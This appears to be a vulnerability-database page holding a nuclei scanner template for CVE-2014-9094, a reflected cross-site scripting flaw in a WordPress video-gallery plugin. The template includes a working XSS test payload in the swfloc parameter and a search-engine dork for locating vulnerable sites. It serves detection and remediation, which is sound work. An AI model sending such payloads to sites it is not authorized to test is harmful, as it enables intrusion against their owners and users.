Lucene search
K

WordPress DZS-VideoGallery Plugin Cross-Site Scripting

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

WordPress DZS-VideoGallery Plugin Cross-Site Scripting CVE-2014-9094 allows remote attackers to inject arbitrary web script or HTML via swfloc or designrand parameter. Potential for session hijacking, defacement, or theft of sensitive information. Update to latest plugin version for fix

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-9094
13 Jul 201400:00
circl
CVE
CVE-2014-9094
26 Nov 201415:00
cve
Cvelist
CVE-2014-9094
26 Nov 201415:00
cvelist
NVD
CVE-2014-9094
26 Nov 201415:59
nvd
OpenVAS
WordPress Digital Zoom Studio (DZS) Video Gallery Plugin Multiple Vulnerabilities
28 Nov 201400:00
openvas
Patchstack
WordPress Digital Zoom Studio Plugin - XSS
26 Nov 201400:00
patchstack
Patchstack
WordPress DZS Video Gallery Plugin - Cross Site Scripting and Command Injection Vulnerabilities
13 Jul 201400:00
patchstack
Prion
Cross site scripting
26 Nov 201415:59
prion
WPVulnDB
DZS Video Gallery Plugin - RCE & More
27 Sep 201412:04
wpvulndb
id: CVE-2014-9094

info:
  name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9094
    - http://websecurity.com.ua/7152/
    - http://seclists.org/fulldisclosure/2014/Jul/65
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2014-9094
    cwe-id: CWE-79
    epss-score: 0.07309
    epss-percentile: 0.93602
    cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: digitalzoomstudio
    product: "video_gallery"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/dzs-videogallery\""
  tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Video Gallery WordPress DZS'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(1)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210082a489ecd238accc48bbe67884cbea45434ba95b9a2b1e031754b368e38e30e6022100b3a36146e8b7f8875c785c8ac3ad6313cbacd6d2b1925a75c5f984046a32d717:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.07309
15